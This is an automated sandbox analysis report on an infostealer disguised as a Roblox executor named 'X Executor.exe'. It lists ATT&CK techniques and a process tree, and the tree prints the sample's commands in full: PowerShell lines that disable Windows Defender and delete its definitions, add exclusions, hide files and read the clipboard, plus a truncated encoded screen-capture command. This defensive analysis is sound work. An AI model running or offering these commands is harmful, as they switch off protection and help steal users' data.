336fec7a946aad9d8f4039f3f329e94404529d8bffd7b2780a8ad747ab2f4e32

Analysis

max time kernel
39s
max time network
38s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18/08/2024, 13:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

X Executor.exe
Size

7.4MB
MD5

6d90c40140099de5f0e9cd712908760e
SHA1

5570ae57076f2ab64833c6880d5f55b56fa47d29
SHA256

336fec7a946aad9d8f4039f3f329e94404529d8bffd7b2780a8ad747ab2f4e32
SHA512

1b217dddc644896f838c13a22357e3bd76c15a8a57847b2f09275252fe984df71cc74165c30838a2f08c66fe487bf9fcdf96b6d46154f6fda18574427972e82c
SSDEEP

98304:7tMcZurErvz81LpWjjUlLkvzgXO9hAlaYrzzuJZYJ1JIuIdKU73bcgVowzW:7DurErvI9pWjgyvoaYrE41JIuIkoxG

Score

9^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4936	powershell.exe
4424	powershell.exe
1700	powershell.exe
3992	powershell.exe
2884	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	X Executor.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4476	powershell.exe
912	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
4272	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe
4680	X Executor.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000002345b-21.dat	upx
behavioral2/memory/4680-25-0x00007FFE851C0000-0x00007FFE857B0000-memory.dmp	upx
behavioral2/files/0x000700000002344d-28.dat	upx
behavioral2/memory/4680-30-0x00007FFE98F70000-0x00007FFE98F94000-memory.dmp	upx
behavioral2/files/0x0007000000023454-47.dat	upx
behavioral2/memory/4680-48-0x00007FFE9C170000-0x00007FFE9C17F000-memory.dmp	upx
behavioral2/files/0x0007000000023453-46.dat	upx
behavioral2/files/0x0007000000023452-45.dat	upx
behavioral2/files/0x0007000000023451-44.dat	upx
behavioral2/files/0x0007000000023450-43.dat	upx
behavioral2/files/0x000700000002344f-42.dat	upx
behavioral2/files/0x000700000002344e-41.dat	upx
behavioral2/files/0x000700000002344c-40.dat	upx
behavioral2/files/0x0007000000023460-39.dat	upx
behavioral2/files/0x000700000002345f-38.dat	upx
behavioral2/files/0x000700000002345e-37.dat	upx
behavioral2/files/0x000700000002345a-34.dat	upx
behavioral2/files/0x0007000000023458-33.dat	upx
behavioral2/files/0x0007000000023459-29.dat	upx
behavioral2/memory/4680-54-0x00007FFE98320000-0x00007FFE9834D000-memory.dmp	upx
behavioral2/memory/4680-56-0x00007FFE991A0000-0x00007FFE991B9000-memory.dmp	upx
behavioral2/memory/4680-58-0x00007FFE94FD0000-0x00007FFE94FF3000-memory.dmp	upx
behavioral2/memory/4680-60-0x00007FFE948F0000-0x00007FFE94A66000-memory.dmp	upx
behavioral2/memory/4680-62-0x00007FFE95040000-0x00007FFE95059000-memory.dmp	upx
behavioral2/memory/4680-64-0x00007FFE98D60000-0x00007FFE98D6D000-memory.dmp	upx
behavioral2/memory/4680-66-0x00007FFE94EF0000-0x00007FFE94F23000-memory.dmp	upx
behavioral2/memory/4680-71-0x00007FFE94660000-0x00007FFE9472D000-memory.dmp	upx
behavioral2/memory/4680-70-0x00007FFE851C0000-0x00007FFE857B0000-memory.dmp	upx
behavioral2/memory/4680-73-0x00007FFE84880000-0x00007FFE84DA9000-memory.dmp	upx
behavioral2/memory/4680-74-0x00007FFE98F70000-0x00007FFE98F94000-memory.dmp	upx
behavioral2/memory/4680-78-0x00007FFE98BE0000-0x00007FFE98BED000-memory.dmp	upx
behavioral2/memory/4680-80-0x00007FFE94400000-0x00007FFE9451C000-memory.dmp	upx
behavioral2/memory/4680-76-0x00007FFE94ED0000-0x00007FFE94EE4000-memory.dmp	upx
behavioral2/memory/4680-92-0x00007FFE94FD0000-0x00007FFE94FF3000-memory.dmp	upx
behavioral2/memory/4680-110-0x00007FFE948F0000-0x00007FFE94A66000-memory.dmp	upx
behavioral2/memory/4680-184-0x00007FFE95040000-0x00007FFE95059000-memory.dmp	upx
behavioral2/memory/4680-275-0x00007FFE94EF0000-0x00007FFE94F23000-memory.dmp	upx
behavioral2/memory/4680-285-0x00007FFE94660000-0x00007FFE9472D000-memory.dmp	upx
behavioral2/memory/4680-294-0x00007FFE84880000-0x00007FFE84DA9000-memory.dmp	upx
behavioral2/memory/4680-315-0x00007FFE851C0000-0x00007FFE857B0000-memory.dmp	upx
behavioral2/memory/4680-321-0x00007FFE948F0000-0x00007FFE94A66000-memory.dmp	upx
behavioral2/memory/4680-316-0x00007FFE98F70000-0x00007FFE98F94000-memory.dmp	upx
behavioral2/memory/4680-330-0x00007FFE851C0000-0x00007FFE857B0000-memory.dmp	upx
behavioral2/memory/4680-343-0x00007FFE98BE0000-0x00007FFE98BED000-memory.dmp	upx
behavioral2/memory/4680-355-0x00007FFE94660000-0x00007FFE9472D000-memory.dmp	upx
behavioral2/memory/4680-354-0x00007FFE94EF0000-0x00007FFE94F23000-memory.dmp	upx
behavioral2/memory/4680-353-0x00007FFE98D60000-0x00007FFE98D6D000-memory.dmp	upx
behavioral2/memory/4680-352-0x00007FFE95040000-0x00007FFE95059000-memory.dmp	upx
behavioral2/memory/4680-351-0x00007FFE948F0000-0x00007FFE94A66000-memory.dmp	upx
behavioral2/memory/4680-350-0x00007FFE94FD0000-0x00007FFE94FF3000-memory.dmp	upx
behavioral2/memory/4680-349-0x00007FFE991A0000-0x00007FFE991B9000-memory.dmp	upx
behavioral2/memory/4680-348-0x00007FFE98320000-0x00007FFE9834D000-memory.dmp	upx
behavioral2/memory/4680-347-0x00007FFE9C170000-0x00007FFE9C17F000-memory.dmp	upx
behavioral2/memory/4680-346-0x00007FFE98F70000-0x00007FFE98F94000-memory.dmp	upx
behavioral2/memory/4680-345-0x00007FFE84880000-0x00007FFE84DA9000-memory.dmp	upx
behavioral2/memory/4680-344-0x00007FFE94400000-0x00007FFE9451C000-memory.dmp	upx
behavioral2/memory/4680-342-0x00007FFE94ED0000-0x00007FFE94EE4000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
38	discord.com
39	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com
36	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4316	tasklist.exe
2668	tasklist.exe
4060	tasklist.exe
4676	tasklist.exe
3168	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2472	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2968	cmd.exe
2252	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2460	cmd.exe
4816	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1528	WMIC.exe
4456	WMIC.exe
2908	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2824	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2252	PING.EXE

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
3992	powershell.exe
3992	powershell.exe
4936	powershell.exe
4936	powershell.exe
3992	powershell.exe
4936	powershell.exe
2884	powershell.exe
2884	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
380	powershell.exe
380	powershell.exe
380	powershell.exe
4424	powershell.exe
4424	powershell.exe
4424	powershell.exe
3836	powershell.exe
3836	powershell.exe
3836	powershell.exe
1700	powershell.exe
1700	powershell.exe
1700	powershell.exe
2044	powershell.exe
2044	powershell.exe
2044	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4316	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1996	WMIC.exe
Token: SeSecurityPrivilege	1996	WMIC.exe
Token: SeTakeOwnershipPrivilege	1996	WMIC.exe
Token: SeLoadDriverPrivilege	1996	WMIC.exe
Token: SeSystemProfilePrivilege	1996	WMIC.exe
Token: SeSystemtimePrivilege	1996	WMIC.exe
Token: SeProfSingleProcessPrivilege	1996	WMIC.exe
Token: SeIncBasePriorityPrivilege	1996	WMIC.exe
Token: SeCreatePagefilePrivilege	1996	WMIC.exe
Token: SeBackupPrivilege	1996	WMIC.exe
Token: SeRestorePrivilege	1996	WMIC.exe
Token: SeShutdownPrivilege	1996	WMIC.exe
Token: SeDebugPrivilege	1996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1996	WMIC.exe
Token: SeRemoteShutdownPrivilege	1996	WMIC.exe
Token: SeUndockPrivilege	1996	WMIC.exe
Token: SeManageVolumePrivilege	1996	WMIC.exe
Token: 33	1996	WMIC.exe
Token: 34	1996	WMIC.exe
Token: 35	1996	WMIC.exe
Token: 36	1996	WMIC.exe
Token: SeDebugPrivilege	3992	powershell.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeIncreaseQuotaPrivilege	1996	WMIC.exe
Token: SeSecurityPrivilege	1996	WMIC.exe
Token: SeTakeOwnershipPrivilege	1996	WMIC.exe
Token: SeLoadDriverPrivilege	1996	WMIC.exe
Token: SeSystemProfilePrivilege	1996	WMIC.exe
Token: SeSystemtimePrivilege	1996	WMIC.exe
Token: SeProfSingleProcessPrivilege	1996	WMIC.exe
Token: SeIncBasePriorityPrivilege	1996	WMIC.exe
Token: SeCreatePagefilePrivilege	1996	WMIC.exe
Token: SeBackupPrivilege	1996	WMIC.exe
Token: SeRestorePrivilege	1996	WMIC.exe
Token: SeShutdownPrivilege	1996	WMIC.exe
Token: SeDebugPrivilege	1996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1996	WMIC.exe
Token: SeRemoteShutdownPrivilege	1996	WMIC.exe
Token: SeUndockPrivilege	1996	WMIC.exe
Token: SeManageVolumePrivilege	1996	WMIC.exe
Token: 33	1996	WMIC.exe
Token: 34	1996	WMIC.exe
Token: 35	1996	WMIC.exe
Token: 36	1996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1528	WMIC.exe
Token: SeSecurityPrivilege	1528	WMIC.exe
Token: SeTakeOwnershipPrivilege	1528	WMIC.exe
Token: SeLoadDriverPrivilege	1528	WMIC.exe
Token: SeSystemProfilePrivilege	1528	WMIC.exe
Token: SeSystemtimePrivilege	1528	WMIC.exe
Token: SeProfSingleProcessPrivilege	1528	WMIC.exe
Token: SeIncBasePriorityPrivilege	1528	WMIC.exe
Token: SeCreatePagefilePrivilege	1528	WMIC.exe
Token: SeBackupPrivilege	1528	WMIC.exe
Token: SeRestorePrivilege	1528	WMIC.exe
Token: SeShutdownPrivilege	1528	WMIC.exe
Token: SeDebugPrivilege	1528	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1528	WMIC.exe
Token: SeRemoteShutdownPrivilege	1528	WMIC.exe
Token: SeUndockPrivilege	1528	WMIC.exe
Token: SeManageVolumePrivilege	1528	WMIC.exe
Token: 33	1528	WMIC.exe
Token: 34	1528	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1932 wrote to memory of 4680	1932	X Executor.exe	84
PID 1932 wrote to memory of 4680	1932	X Executor.exe	84
PID 4680 wrote to memory of 4328	4680	X Executor.exe	88
PID 4680 wrote to memory of 4328	4680	X Executor.exe	88
PID 4680 wrote to memory of 4996	4680	X Executor.exe	89
PID 4680 wrote to memory of 4996	4680	X Executor.exe	89
PID 4680 wrote to memory of 1864	4680	X Executor.exe	90
PID 4680 wrote to memory of 1864	4680	X Executor.exe	90
PID 4680 wrote to memory of 5076	4680	X Executor.exe	94
PID 4680 wrote to memory of 5076	4680	X Executor.exe	94
PID 4680 wrote to memory of 2040	4680	X Executor.exe	96
PID 4680 wrote to memory of 2040	4680	X Executor.exe	96
PID 5076 wrote to memory of 4316	5076	cmd.exe	98
PID 5076 wrote to memory of 4316	5076	cmd.exe	98
PID 4328 wrote to memory of 3992	4328	cmd.exe	99
PID 4328 wrote to memory of 3992	4328	cmd.exe	99
PID 2040 wrote to memory of 1996	2040	cmd.exe	100
PID 2040 wrote to memory of 1996	2040	cmd.exe	100
PID 4996 wrote to memory of 4936	4996	cmd.exe	101
PID 4996 wrote to memory of 4936	4996	cmd.exe	101
PID 1864 wrote to memory of 2304	1864	cmd.exe	102
PID 1864 wrote to memory of 2304	1864	cmd.exe	102
PID 4680 wrote to memory of 4072	4680	X Executor.exe	104
PID 4680 wrote to memory of 4072	4680	X Executor.exe	104
PID 4072 wrote to memory of 2128	4072	cmd.exe	106
PID 4072 wrote to memory of 2128	4072	cmd.exe	106
PID 4680 wrote to memory of 492	4680	X Executor.exe	107
PID 4680 wrote to memory of 492	4680	X Executor.exe	107
PID 492 wrote to memory of 504	492	cmd.exe	109
PID 492 wrote to memory of 504	492	cmd.exe	109
PID 4680 wrote to memory of 3040	4680	X Executor.exe	110
PID 4680 wrote to memory of 3040	4680	X Executor.exe	110
PID 3040 wrote to memory of 1528	3040	cmd.exe	175
PID 3040 wrote to memory of 1528	3040	cmd.exe	175
PID 4680 wrote to memory of 3380	4680	X Executor.exe	113
PID 4680 wrote to memory of 3380	4680	X Executor.exe	113
PID 3380 wrote to memory of 4456	3380	cmd.exe	162
PID 3380 wrote to memory of 4456	3380	cmd.exe	162
PID 4680 wrote to memory of 2472	4680	X Executor.exe	116
PID 4680 wrote to memory of 2472	4680	X Executor.exe	116
PID 4680 wrote to memory of 2308	4680	X Executor.exe	117
PID 4680 wrote to memory of 2308	4680	X Executor.exe	117
PID 2472 wrote to memory of 796	2472	cmd.exe	120
PID 2472 wrote to memory of 796	2472	cmd.exe	120
PID 2308 wrote to memory of 2884	2308	cmd.exe	121
PID 2308 wrote to memory of 2884	2308	cmd.exe	121
PID 4680 wrote to memory of 1664	4680	X Executor.exe	122
PID 4680 wrote to memory of 1664	4680	X Executor.exe	122
PID 4680 wrote to memory of 1860	4680	X Executor.exe	123
PID 4680 wrote to memory of 1860	4680	X Executor.exe	123
PID 1664 wrote to memory of 2668	1664	cmd.exe	126
PID 1664 wrote to memory of 2668	1664	cmd.exe	126
PID 1860 wrote to memory of 4060	1860	cmd.exe	128
PID 1860 wrote to memory of 4060	1860	cmd.exe	128
PID 4680 wrote to memory of 3808	4680	X Executor.exe	129
PID 4680 wrote to memory of 3808	4680	X Executor.exe	129
PID 4680 wrote to memory of 912	4680	X Executor.exe	130
PID 4680 wrote to memory of 912	4680	X Executor.exe	130
PID 4680 wrote to memory of 1804	4680	X Executor.exe	133
PID 4680 wrote to memory of 1804	4680	X Executor.exe	133
PID 4680 wrote to memory of 1512	4680	X Executor.exe	135
PID 4680 wrote to memory of 1512	4680	X Executor.exe	135
PID 3808 wrote to memory of 4236	3808	cmd.exe	136
PID 3808 wrote to memory of 4236	3808	cmd.exe	136

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
796	attrib.exe
4384	attrib.exe
1700	attrib.exe

C:\Users\Admin\AppData\Local\Temp\X Executor.exe
"C:\Users\Admin\AppData\Local\Temp\X Executor.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1932
- C:\Users\Admin\AppData\Local\Temp\X Executor.exe
  "C:\Users\Admin\AppData\Local\Temp\X Executor.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\X Executor.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\X Executor.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Roblox has updated, X executor has not.', 0, 'Error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1864
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Roblox has updated, X executor has not.', 0, 'Error', 0+16);close()"
      4⤵
      PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5076
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4072
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:492
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\X Executor.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2472
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\X Executor.exe"
      4⤵
      Views/modifies file attributes
      PID:796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‎.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‎.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1664
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1860
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3808
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1804
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1512
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2460
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1952
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2176
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA